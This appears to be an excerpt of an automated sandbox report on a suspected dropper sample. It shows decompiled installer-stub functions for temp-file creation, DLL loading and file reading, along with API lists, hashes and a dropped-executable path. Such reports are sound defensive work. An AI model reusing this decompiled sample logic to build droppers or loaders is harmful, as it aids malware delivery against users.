                    • Source File: 00000000.00000002.260738972.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.260734428.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.260747957.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.260784814.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.260791797.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261016633.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261025813.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261032739.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261037968.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261051766.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261058159.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261063898.00000000007B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261068161.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_inlaww321345.jbxd
                    Similarity
                    • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                    • String ID: C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe C:\Users\user\AppData\Local\Temp\naxsk
                    • API String ID: 1941528284-2435374271
                    • Opcode ID: c88ed36c007d22437061545d9d5dec38a2b75a4754de15431c99bf9f19713014
                    • Instruction ID: c895feda3e823d9c0bc0fb7144dfd3dc41df657037fc16576ccee127d24ab7e8
                    • Opcode Fuzzy Hash: c88ed36c007d22437061545d9d5dec38a2b75a4754de15431c99bf9f19713014
                    • Instruction Fuzzy Hash: CB41D571800108BACF11BBB5DD85DAE7679EF45328F20463FF422B11E1DB3D89619A2E
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 004069CB Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36libraryCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 520 4069cb-4069eb GetSystemDirectoryW 521 4069ed 520->521 522 4069ef-4069f1 520->522 521->522 523 406a02-406a04 522->523 524 4069f3-4069fc 522->524 526 406a05-406a38 wsprintfW LoadLibraryExW 523->526 524->523 525 4069fe-406a00 524->525 525->526
                    C-Code - Quality: 100%
                    			E004069CB(intOrPtr _a4) {
				short _v576;
				signed int _t13;
				struct HINSTANCE__* _t17;
				signed int _t19;
				void* _t24;

				_t13 = GetSystemDirectoryW( &_v576, 0x104);
				if(_t13 > 0x104) {
					_t13 = 0;
				}
				if(_t13 == 0 ||  *((short*)(_t24 + _t13 * 2 - 0x23e)) == 0x5c) {
					_t19 = 1;
				} else {
					_t19 = 0;
				}
				wsprintfW(_t24 + _t13 * 2 - 0x23c, L"%s%S.dll", 0x40a014 + _t19 * 2, _a4);
				_t17 = LoadLibraryExW( &_v576, 0, 8); // executed
				return _t17;
			}








                    0x004069e2
                    0x004069eb
                    0x004069ed
                    0x004069ed
                    0x004069f1
                    0x00406a04
                    0x004069fe
                    0x004069fe
                    0x004069fe
                    0x00406a1d
                    0x00406a31
                    0x00406a38

                    APIs
                    • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004069E2
                    • wsprintfW.USER32 ref: 00406A1D
                    • LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 00406A31
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.260738972.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.260734428.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.260747957.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.260784814.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.260791797.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261016633.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261025813.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261032739.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261037968.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261051766.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261058159.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261063898.00000000007B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261068161.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_inlaww321345.jbxd
                    Similarity
                    • API ID: DirectoryLibraryLoadSystemwsprintf
                    • String ID: %s%S.dll$UXTHEME$\
                    • API String ID: 2200240437-1946221925
                    • Opcode ID: 63130bafcb32548bd4340548baa3f8658423137b3882cd96386db367ad08b740
                    • Instruction ID: edb644a17e19fa0d5d66c6da3b257654e99a3b388903ea93700411201bdfbebd
                    • Opcode Fuzzy Hash: 63130bafcb32548bd4340548baa3f8658423137b3882cd96386db367ad08b740
                    • Instruction Fuzzy Hash: 37F0F671600219A7DB14BB64DD0EF9B376CAB00304F11447AA646F10D0FB7CDB68CB98
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00405B9F Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 39COMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 527 405b9f-405bea CreateDirectoryW 528 405bf0-405bfd GetLastError 527->528 529 405bec-405bee 527->529 530 405c17-405c19 528->530 531 405bff-405c13 SetFileSecurityW 528->531 529->530 531->529 532 405c15 GetLastError 531->532 532->530
                    C-Code - Quality: 100%
                    			E00405B9F(WCHAR* _a4) {
				struct _SECURITY_ATTRIBUTES _v16;
				struct _SECURITY_DESCRIPTOR _v36;
				int _t22;
				long _t23;

				_v36.Sbz1 = _v36.Sbz1 & 0x00000000;
				_v36.Owner = 0x4083f8;
				_v36.Group = 0x4083f8;
				_v36.Sacl = _v36.Sacl & 0x00000000;
				_v16.bInheritHandle = _v16.bInheritHandle & 0x00000000;
				_v16.lpSecurityDescriptor =  &_v36;
				_v36.Revision = 1;
				_v36.Control = 4;
				_v36.Dacl = 0x4083e8;
				_v16.nLength = 0xc;
				_t22 = CreateDirectoryW(_a4,  &_v16); // executed
				if(_t22 != 0) {
					L1:
					return 0;
				}
				_t23 = GetLastError();
				if(_t23 == 0xb7) {
					if(SetFileSecurityW(_a4, 0x80000007,  &_v36) != 0) {
						goto L1;
					}
					return GetLastError();
				}
				return _t23;
			}







                    0x00405baa
                    0x00405bae
                    0x00405bb1
                    0x00405bb7
                    0x00405bbb
                    0x00405bbf
                    0x00405bc7
                    0x00405bce
                    0x00405bd4
                    0x00405bdb
                    0x00405be2
                    0x00405bea
                    0x00405bec
                    0x00000000
                    0x00405bec
                    0x00405bf6
                    0x00405bfd
                    0x00405c13
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00405c15
                    0x00405c19

                    APIs
                    • CreateDirectoryW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405BE2
                    • GetLastError.KERNEL32 ref: 00405BF6
                    • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 00405C0B
                    • GetLastError.KERNEL32 ref: 00405C15
                    Strings
                    • C:\Users\user\AppData\Local\Temp\, xrefs: 00405BC5
                    Memory Dump Source
                    • Source File: 00000000.00000002.260738972.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.260734428.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.260747957.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.260784814.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.260791797.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261016633.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261025813.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261032739.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261037968.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261051766.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261058159.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261063898.00000000007B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261068161.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_inlaww321345.jbxd
                    Similarity
                    • API ID: ErrorLast$CreateDirectoryFileSecurity
                    • String ID: C:\Users\user\AppData\Local\Temp\
                    • API String ID: 3449924974-3916508600
                    • Opcode ID: 4d8c721838b8a92ea27708fe49d100345a2f80ebd1be40878b53e15a1b169c58
                    • Instruction ID: a4b5b825bdd4266eac6b0ee8a32438dce20ed58698919e53373cd8165130f89a
                    • Opcode Fuzzy Hash: 4d8c721838b8a92ea27708fe49d100345a2f80ebd1be40878b53e15a1b169c58
                    • Instruction Fuzzy Hash: 31010871D04219EAEF009BA0C944BEFBFB8EF04314F00403AD545B6191E7799A48CF99
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0040347F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 101COMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 533 40347f-4034a7 GetTickCount 534 4035d7-4035df call 40302e 533->534 535 4034ad-4034d8 call 4035fe SetFilePointer 533->535 540 4035e1-4035e5 534->540 541 4034dd-4034ef 535->541 542 4034f1 541->542 543 4034f3-403501 call 4035e8 541->543 542->543 546 403507-403513 543->546 547 4035c9-4035cc 543->547 548 403519-40351f 546->548 547->540 549 403521-403527 548->549 550 40354a-403566 call 406b96 548->550 549->550 551 403529-403549 call 40302e 549->551 556 4035d2 550->556 557 403568-403570 550->557 551->550 558 4035d4-4035d5 556->558 559 403572-40357a call 406210 557->559 560 403593-403599 557->560 558->540 564 40357f-403581 559->564 560->556 561 40359b-40359d 560->561 561->556 563 40359f-4035b2 561->563 563->541 565 4035b8-4035c7 SetFilePointer 563->565 566 403583-40358f 564->566 567 4035ce-4035d0 564->567 565->534 566->548 568 403591 566->568 567->558 568->563
                    C-Code - Quality: 93%
                    			E0040347F(intOrPtr _a4) {
				intOrPtr _t11;
				signed int _t12;
				void* _t15;
				long _t16;
				void* _t18;
				intOrPtr _t30;
				intOrPtr _t33;
				intOrPtr _t35;
				void* _t36;
				intOrPtr _t48;

				_t33 =  *0x79f734 -  *0x40ce60 + _a4;
				 *0x7a8aac = GetTickCount() + 0x1f4;
				if(_t33 <= 0) {
					L22:
					E0040302E(1);
					return 0;
				}
				E004035FE( *0x79f744);
				SetFilePointer( *0x40a01c,  *0x40ce60, 0, 0); // executed
				 *0x79f740 = _t33;
				 *0x79f730 = 0;
				while(1) {
					_t30 = 0x4000;
					_t11 =  *0x79f738 -  *0x79f744;
					if(_t11 <= 0x4000) {
						_t30 = _t11;
					}
					_t12 = E004035E8(0x793730, _t30);
					if(_t12 == 0) {
						break;
					}
					 *0x79f744 =  *0x79f744 + _t30;
					 *0x40ce68 = 0x793730;
					 *0x40ce6c = _t30;
					L6:
					L6:
					if( *0x7a8ab0 != 0 &&  *0x7a8b40 == 0) {
						 *0x79f730 =  *0x79f740 -  *0x79f734 - _a4 +  *0x40ce60;
						E0040302E(0);
					}
					 *0x40ce70 = 0x78b730;
					 *0x40ce74 = 0x8000;
					if(E00406B96(0x40ce68) < 0) {
						goto L20;
					}
					_t35 =  *0x40ce70; // 0x790349
					_t36 = _t35 - 0x78b730;
					if(_t36 == 0) {
						__eflags =  *0x40ce6c; // 0x0
						if(__eflags != 0) {
							goto L20;
						}
						__eflags = _t30;
						if(_t30 == 0) {
							goto L20;
						}
						L16:
						_t16 =  *0x79f734;
						if(_t16 -  *0x40ce60 + _a4 > 0) {
							continue;
						}
						SetFilePointer( *0x40a01c, _t16, 0, 0); // executed
						goto L22;
					}
					_t18 = E00406210( *0x40a01c, 0x78b730, _t36); // executed
					if(_t18 == 0) {
						_push(0xfffffffe);
						L21:
						_pop(_t15);
						return _t15;
					}
					 *0x40ce60 =  *0x40ce60 + _t36;
					_t48 =  *0x40ce6c; // 0x0
					if(_t48 != 0) {
						goto L6;
					}
					goto L16;
					L20:
					_push(0xfffffffd);
					goto L21;
				}
				return _t12 | 0xffffffff;
			}













                    0x0040348f
                    0x004034a2
                    0x004034a7
                    0x004035d7
                    0x004035d9
                    0x00000000
                    0x004035df
                    0x004034b3
                    0x004034c6
                    0x004034cc
                    0x004034d2
                    0x004034dd
                    0x004034e2
                    0x004034e7
                    0x004034ef
                    0x004034f1
                    0x004034f1
                    0x004034fa
                    0x00403501
                    0x00000000
                    0x00000000
                    0x00403507
                    0x0040350d
                    0x00403513
                    0x00000000
                    0x00403519
                    0x0040351f
                    0x0040353f
                    0x00403544
                    0x00403549
                    0x0040354f
                    0x00403555
                    0x00403566
                    0x00000000
                    0x00000000
                    0x00403568
                    0x0040356e
                    0x00403570
                    0x00403593
                    0x00403599
                    0x00000000
                    0x00000000
                    0x0040359b
                    0x0040359d
                    0x00000000
                    0x00000000
                    0x0040359f
                    0x0040359f
                    0x004035b2
                    0x00000000
                    0x00000000
                    0x004035c1
                    0x00000000
                    0x004035c1
                    0x0040357a
                    0x00403581
                    0x004035ce
                    0x004035d4
                    0x004035d4
                    0x00000000
                    0x004035d4
                    0x00403583
                    0x00403589
                    0x0040358f
                    0x00000000
                    0x00000000
                    0x00000000
                    0x004035d2
                    0x004035d2
                    0x00000000
                    0x004035d2
                    0x00000000

                    APIs
                    • GetTickCount.KERNEL32 ref: 00403493
                      • Part of subcall function 004035FE: SetFilePointer.KERNELBASE(00000000,00000000,00000000,004032FC,?), ref: 0040360C
                    • SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,004033A9,00000004,00000000,00000000,?,?,00403323,000000FF,00000000,00000000,?,?), ref: 004034C6
                    • SetFilePointer.KERNELBASE(?,00000000,00000000,0040CE68,00793730,00004000,?,00000000,004033A9,00000004,00000000,00000000,?,?,00403323,000000FF), ref: 004035C1
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.260738972.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.260734428.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.260747957.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.260784814.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.260791797.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261016633.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261025813.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261032739.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261037968.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261051766.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261058159.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261063898.00000000007B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261068161.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_inlaww321345.jbxd
                    Similarity
                    • API ID: FilePointer$CountTick
                    • String ID: 07y
                    • API String ID: 1092082344-1660179758
                    • Opcode ID: 5ef9f3cf75525ab0b28f5e9a18968e2fb4815e048a68f3a4626f05087b93d5e0
                    • Instruction ID: fa4fce997e9b0d1f670701ff0d5ea0446f36afc43afd7a1273bf0b0fb6409833
                    • Opcode Fuzzy Hash: 5ef9f3cf75525ab0b28f5e9a18968e2fb4815e048a68f3a4626f05087b93d5e0
                    • Instruction Fuzzy Hash: 6E31AEB2510215EFCB209F69FE8492A3BADF74475A714423BE401B22F0DB795D02CB9D
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0040618D Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 37COMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 569 40618d-406199 570 40619a-4061ce GetTickCount GetTempFileNameW 569->570 571 4061d0-4061d2 570->571 572 4061dd-4061df 570->572 571->570 573 4061d4 571->573 574 4061d7-4061da 572->574 573->574
                    C-Code - Quality: 100%
                    			E0040618D(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
				intOrPtr _v8;
				short _v12;
				short _t12;
				intOrPtr _t13;
				signed int _t14;
				WCHAR* _t17;
				signed int _t19;
				signed short _t23;
				WCHAR* _t26;

				_t26 = _a4;
				_t23 = 0x64;
				while(1) {
					_t12 =  *L"nsa"; // 0x73006e
					_t23 = _t23 - 1;
					_v12 = _t12;
					_t13 =  *0x40a5ac; // 0x61
					_v8 = _t13;
					_t14 = GetTickCount();
					_t19 = 0x1a;
					_v8 = _v8 + _t14 % _t19;
					_t17 = GetTempFileNameW(_a8,  &_v12, 0, _t26); // executed
					if(_t17 != 0) {
						break;
					}
					if(_t23 != 0) {
						continue;
					} else {
						 *_t26 =  *_t26 & _t23;
					}
					L4:
					return _t17;
				}
				_t17 = _t26;
				goto L4;
			}












                    0x00406193
                    0x00406199
                    0x0040619a
                    0x0040619a
                    0x0040619f
                    0x004061a0
                    0x004061a3
                    0x004061a8
                    0x004061ab
                    0x004061b5
                    0x004061c2
                    0x004061c6
                    0x004061ce
                    0x00000000
                    0x00000000
                    0x004061d2
                    0x00000000
                    0x004061d4
                    0x004061d4
                    0x004061d4
                    0x004061d7
                    0x004061da
                    0x004061da
                    0x004061dd
                    0x00000000

                    APIs
                    • GetTickCount.KERNEL32 ref: 004061AB
                    • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,?,00403644,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403929), ref: 004061C6
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.260738972.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.260734428.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.260747957.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.260784814.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.260791797.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261016633.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261025813.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261032739.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261037968.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261051766.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261058159.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261063898.00000000007B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261068161.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_inlaww321345.jbxd
                    Similarity
                    • API ID: CountFileNameTempTick
                    • String ID: C:\Users\user\AppData\Local\Temp\$nsa
                    • API String ID: 1716503409-1968954121
                    • Opcode ID: 6315ab6e6f8253ba2c88c9b6803a176270f8621abb800126aa0f3c3b7b9ef66c
                    • Instruction ID: 4618a7cd5e379287717806b061479f75a97df545f28ae60e57938b9bb9b89627
                    • Opcode Fuzzy Hash: 6315ab6e6f8253ba2c88c9b6803a176270f8621abb800126aa0f3c3b7b9ef66c
                    • Instruction Fuzzy Hash: 4CF09676700214BFDB008F55ED05E9AB7BCEF91710F11803AEE05E7150E6B099548764
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00403C2B Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 20COMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 575 403c2b-403c3a 576 403c46-403c4e 575->576 577 403c3c-403c3f CloseHandle 575->577 578 403c50-403c53 CloseHandle 576->578 579 403c5a-403c66 call 403c88 call 405d7a 576->579 577->576 578->579 583 403c6b-403c6c 579->583
                    C-Code - Quality: 100%
                    			E00403C2B() {
				void* _t1;
				void* _t2;
				void* _t4;
				signed int _t11;

				_t1 =  *0x40a018; // 0xffffffff
				if(_t1 != 0xffffffff) {
					CloseHandle(_t1);
					 *0x40a018 =  *0x40a018 | 0xffffffff;
				}
				_t2 =  *0x40a01c; // 0xffffffff
				if(_t2 != 0xffffffff) {
					CloseHandle(_t2);
					 *0x40a01c =  *0x40a01c | 0xffffffff;
					_t11 =  *0x40a01c;
				}
				E00403C88();
				_t4 = E00405D7A(_t11, L"C:\\Users\\hardz\\AppData\\Local\\Temp\\nszD9B9.tmp\\", 7); // executed
				return _t4;
			}







                    0x00403c2b
                    0x00403c3a
                    0x00403c3d
                    0x00403c3f
                    0x00403c3f
                    0x00403c46
                    0x00403c4e
                    0x00403c51
                    0x00403c53
                    0x00403c53
                    0x00403c53
                    0x00403c5a
                    0x00403c66
                    0x00403c6c

                    APIs
                    • CloseHandle.KERNEL32(FFFFFFFF,C:\Users\user\AppData\Local\Temp\,00403B77,?), ref: 00403C3D
                    • CloseHandle.KERNEL32(FFFFFFFF,C:\Users\user\AppData\Local\Temp\,00403B77,?), ref: 00403C51
                    Strings
                    • C:\Users\user\AppData\Local\Temp\, xrefs: 00403C30
                    • C:\Users\user\AppData\Local\Temp\nszD9B9.tmp\, xrefs: 00403C61
                    Memory Dump Source
                    • Source File: 00000000.00000002.260738972.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.260734428.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.260747957.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.260784814.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.260791797.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261016633.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261025813.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261032739.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261037968.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261051766.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261058159.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261063898.00000000007B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261068161.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_inlaww321345.jbxd
                    Similarity
                    • API ID: CloseHandle
                    • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\nszD9B9.tmp\
                    • API String ID: 2962429428-554133099
                    • Opcode ID: 52edf64d19f6e486756a6566919607a0afda347394bdeaae2c0f5391c2589c01
                    • Instruction ID: 4491f7c80fa00ae2087dec4a459748e9e372b7f9a3145cafecdefc003a92e639
                    • Opcode Fuzzy Hash: 52edf64d19f6e486756a6566919607a0afda347394bdeaae2c0f5391c2589c01
                    • Instruction Fuzzy Hash: F3E0863244471896D1347F7DAE4D9853B195F413327204326F178F20F0C7389AA74A99
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00403377 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 88COMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 584 403377-403384 585 4033a2-4033ab call 40347f 584->585 586 403386-40339c SetFilePointer 584->586 589 4033b1-4033c4 call 4061e1 585->589 590 403479-40347c 585->590 586->585 593 403469 589->593 594 4033ca-4033dd call 40347f 589->594 596 40346b-40346c 593->596 598 4033e3-4033e6 594->598 599 403477 594->599 596->590 600 403445-40344b 598->600 601 4033e8-4033eb 598->601 599->590 602 403450-403467 ReadFile 600->602 603 40344d 600->603 601->599 604 4033f1 601->604 602->593 605 40346e-403471 602->605 603->602 606 4033f6-403400 604->606 605->599 607 403402 606->607 608 403407-403419 call 4061e1 606->608 607->608 608->593 611 40341b-403422 call 406210 608->611 613 403427-403429 611->613 614 403441-403443 613->614 615 40342b-40343d 613->615 614->596 615->606 616 40343f 615->616 616->599
                    C-Code - Quality: 92%
                    			E00403377(void* __ecx, long _a4, intOrPtr _a8, void* _a12, long _a16) {
				long _v8;
				long _t21;
				long _t22;
				void* _t24;
				long _t26;
				int _t27;
				long _t28;
				void* _t30;
				long _t31;
				long _t32;
				long _t36;

				_t21 = _a4;
				if(_t21 >= 0) {
					_t32 = _t21 +  *0x7a8af8;
					 *0x79f734 = _t32;
					SetFilePointer( *0x40a01c, _t32, 0, 0); // executed
				}
				_t22 = E0040347F(4);
				if(_t22 >= 0) {
					_t24 = E004061E1( *0x40a01c,  &_a4, 4); // executed
					if(_t24 == 0) {
						L18:
						_push(0xfffffffd);
						goto L19;
					} else {
						 *0x79f734 =  *0x79f734 + 4;
						_t36 = E0040347F(_a4);
						if(_t36 < 0) {
							L21:
							_t22 = _t36;
						} else {
							if(_a12 != 0) {
								_t26 = _a4;
								if(_t26 >= _a16) {
									_t26 = _a16;
								}
								_t27 = ReadFile( *0x40a01c, _a12, _t26,  &_v8, 0); // executed
								if(_t27 != 0) {
									_t36 = _v8;
									 *0x79f734 =  *0x79f734 + _t36;
									goto L21;
								} else {
									goto L18;
								}
							} else {
								if(_a4 <= 0) {
									goto L21;
								} else {
									while(1) {
										_t28 = _a4;
										if(_a4 >= 0x4000) {
											_t28 = 0x4000;
										}
										_v8 = _t28;
										if(E004061E1( *0x40a01c, 0x793730, _t28) == 0) {
											goto L18;
										}
										_t30 = E00406210(_a8, 0x793730, _v8); // executed
										if(_t30 == 0) {
											_push(0xfffffffe);
											L19:
											_pop(_t22);
										} else {
											_t31 = _v8;
											_a4 = _a4 - _t31;
											 *0x79f734 =  *0x79f734 + _t31;
											_t36 = _t36 + _t31;
											if(_a4 > 0) {
												continue;
											} else {
												goto L21;
											}
										}
										goto L22;
									}
									goto L18;
								}
							}
						}
					}
				}
				L22:
				return _t22;
			}














                    0x0040337b
                    0x00403384
                    0x0040338d
                    0x00403391
                    0x0040339c
                    0x0040339c
                    0x004033a4
                    0x004033ab
                    0x004033bd
                    0x004033c4
                    0x00403469
                    0x00403469
                    0x00000000
                    0x004033ca
                    0x004033cd
                    0x004033d9
                    0x004033dd
                    0x00403477
                    0x00403477
                    0x004033e3
                    0x004033e6
                    0x00403445
                    0x0040344b
                    0x0040344d
                    0x0040344d
                    0x0040345f
                    0x00403467
                    0x0040346e
                    0x00403471
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x004033e8
                    0x004033eb
                    0x00000000
                    0x004033f1
                    0x004033f6
                    0x004033fd
                    0x00403400
                    0x00403402
                    0x00403402
                    0x0040340f
                    0x00403419
                    0x00000000
                    0x00000000
                    0x00403422
                    0x00403429
                    0x00403441
                    0x0040346b
                    0x0040346b
                    0x0040342b
                    0x0040342b
                    0x0040342e
                    0x00403431
                    0x00403437
                    0x0040343d
                    0x00000000
                    0x0040343f
                    0x00000000
                    0x0040343f
                    0x0040343d
                    0x00000000
                    0x00403429
                    0x00000000
                    0x004033f6
                    0x004033eb
                    0x004033e6
                    0x004033dd
                    0x004033c4
                    0x00403479
                    0x0040347c

                    APIs
